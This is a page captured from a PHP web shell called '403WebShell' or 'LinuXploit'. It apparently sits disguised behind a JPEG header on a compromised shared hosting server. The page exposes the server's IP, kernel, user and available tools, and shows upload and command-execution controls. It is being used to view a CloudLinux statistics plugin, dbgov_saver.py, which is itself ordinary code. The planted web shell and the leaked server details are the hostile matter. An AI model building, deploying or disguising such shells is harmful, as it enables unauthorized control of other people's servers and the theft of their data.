????JFIF??x?x????'403WebShell
403Webshell
Server IP : 104.21.30.238  /  Your IP : 216.73.216.145
Web Server : LiteSpeed
System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User : tempvsty ( 647)
PHP Version : 8.0.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /././opt/cloudlinux/venv/lib64/python3.11/site-packages/lvestats/plugins/generic/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /././opt/cloudlinux/venv/lib64/python3.11/site-packages/lvestats/plugins/generic//dbgov_saver.py
# coding=utf-8
#
# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2020 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT

import logging
import os
import re

from sqlalchemy.exc import SQLAlchemyError

from clcommon.clpwd import ClPwd
from lvestats.core.plugin import LveStatsPlugin
from lvestats.lib.commons.func import reboot_lock
from lvestats.lib.commons.sizeutil import dbgov_io_bytes_value
from lvestats.orm.history_gov import history_gov

MAX_FILES_PER_TRANSACTION = 1000


class DBGovSaver(LveStatsPlugin):
    DBSTAT_DIR = "/var/lve/dbgovernor/"
    FILE_PATTERN = re.compile(r"governor\.[0-9]+$", re.IGNORECASE)
    _history_gov_col = list(history_gov.__table__.columns.keys())

    def __init__(self):
        self.logger = logging.getLogger(__name__)
        self.server_id = "localhost"
        self.engine = None
        self.headers = (
            ("username", str),
            None,  # max_simultaneous_requests not support
            ("sum_cpu", float),
            ("sum_write", float),
            ("sum_read", float),
            None,  # max_cpu not support
            None,  # max_write not support
            None,  # max_read not support
            ("number_of_restricts", int),
            ("limit_cpu_on_period_end", int),
            ("limit_read_on_period_end", int),
            ("limit_write_on_period_end", int),
            ("cause_of_restrict", int),
            ("uid", int),
        )
        self._headers_len = len(self.headers)
        self.cl_pwd = ClPwd()
        self.min_uid = self.cl_pwd.get_sys_min_uid(500)

    def set_config(self, config):
        self.server_id = config.get("server_id", self.server_id)

    def get_user_id(self, username):
        try:
            return self.cl_pwd.get_uid(username)
        except self.cl_pwd.NoSuchUserException as e:
            self.logger.debug('Can not obtain user id for "%s"; %s', username, e)
            return -1

    def scan_dir(self):
        """
        Scans directory generated by db governer and prepares statistics for insertion into database.
        :return: list of tuples [(file name, [lines]), (file name, [lines])...]
        """
        if os.path.exists(self.DBSTAT_DIR):
            flist = filter(self.FILE_PATTERN.search, os.listdir(self.DBSTAT_DIR))
            for f in flist:
                try:
                    file_name = os.path.join(self.DBSTAT_DIR, f)
                    with open(file_name, "r", encoding="utf-8") as f_stats:
                        f_stats_lines = f_stats.readlines()
                    yield file_name, f_stats_lines
                except IOError:
                    self.logger.warning("No file statistic")
                except UnicodeDecodeError:
                    with open(file_name, "r", errors="surrogateescape", encoding="utf-8") as file:
                        f_source = file.read()
                        self.logger.error(
                            "Error while decoding the file %s",
                            f,
                            exc_info=True,
                            extra={f: f_source},
                        )
                        yield file_name, []

    def write_to_db(self, conn, scanned):
        """
        :type scanned: generator
        :type conn: sqlalchemy.engine.base.Connection
        :rtype: list(dict(str, int|str))
        """
        values_list = []
        unlink_list = []
        for n_, (file_name, lines) in enumerate(scanned):
            if MAX_FILES_PER_TRANSACTION < n_:
                break
            for line in lines:
                try:
                    self.logger.debug("write: %s", line)
                    line_splited = line.strip().split(";")
                    file_timestamp = int(file_name.split(".")[-1])
                    values = {"server_id": self.server_id, "ts": file_timestamp}
                    values.update(dict([(h_[0], h_[1](v_)) for h_, v_ in zip(self.headers, line_splited) if h_]))
                    if (
                        # 'uid' might be:
                        # - missing (in governor-mysql < 1.2-1 and under some Gov configurations)
                        # - negative (e.g. if Gov. account name does not coincide with any Unix user name)
                        # and it's planned for removal in the future (CLOS-3317)
                        not values.get("uid")
                        or values.get("uid") < 0
                    ):
                        values["uid"] = self.get_user_id(values["username"])  # extend dict by user id
                    if values["uid"] >= self.min_uid:  # ignoring system users and when we can't extract user id
                        values_list.append(values)
                except (IndexError, ValueError):
                    self.logger.warning("Can not parse file %s; data from file not be writen to database", file_name)
            unlink_list.append(file_name)

        # Data to transfer to CM plugin
        data_for_cm = {}

        # insert all data per one commit
        with reboot_lock():
            if values_list:
                try:
                    # filter for insert only supported columns
                    values_list_filtered = [
                        {k: v for k, v in list(d.items()) if k in self._history_gov_col} for d in values_list
                    ]
                    # form data for CM plugin
                    for dbgov_data in values_list_filtered:
                        uid = dbgov_data["uid"]
                        data_for_cm[uid] = {
                            "cpu_limit": dbgov_data["limit_cpu_on_period_end"],
                            "io_limit": dbgov_io_bytes_value(
                                dbgov_data["limit_read_on_period_end"], dbgov_data["limit_write_on_period_end"]
                            ),
                            "cpu_usage": round(dbgov_data["sum_cpu"], 1),
                            "io_usage": dbgov_io_bytes_value(dbgov_data["sum_read"], dbgov_data["sum_write"]),
                        }
                    conn.execute(history_gov.__table__.insert(), values_list_filtered)
                except (SQLAlchemyError, KeyError) as e:
                    self.logger.warning(str(e))
            try:
                list(map(os.unlink, unlink_list))
            except OSError:
                pass

        return data_for_cm

    def execute(self, lve_data):
        """
        :type lve_data: dict
        """
        if "dbgov_data" not in lve_data:
            lve_data["dbgov_data"] = []
        conn = self.engine.connect()
        try:
            scanned = self.scan_dir()
            dbgov_data_for_cm = self.write_to_db(conn, scanned)
            if dbgov_data_for_cm:
                lve_data["dbgov_data_for_cm"] = dbgov_data_for_cm
        finally:
            conn.close()

Youez - 2016 - github.com/yon3zu
LinuXploit